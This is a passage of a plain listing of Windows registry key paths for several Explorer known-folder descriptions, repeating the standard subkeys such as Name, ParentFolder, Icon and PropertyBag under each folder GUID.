HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2A00375E-224C-49DE-B8D1-440DF7EF3DDC}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{E555AB60-153B-4D17-9F04-A5FE99FC15EC}\ParsingName
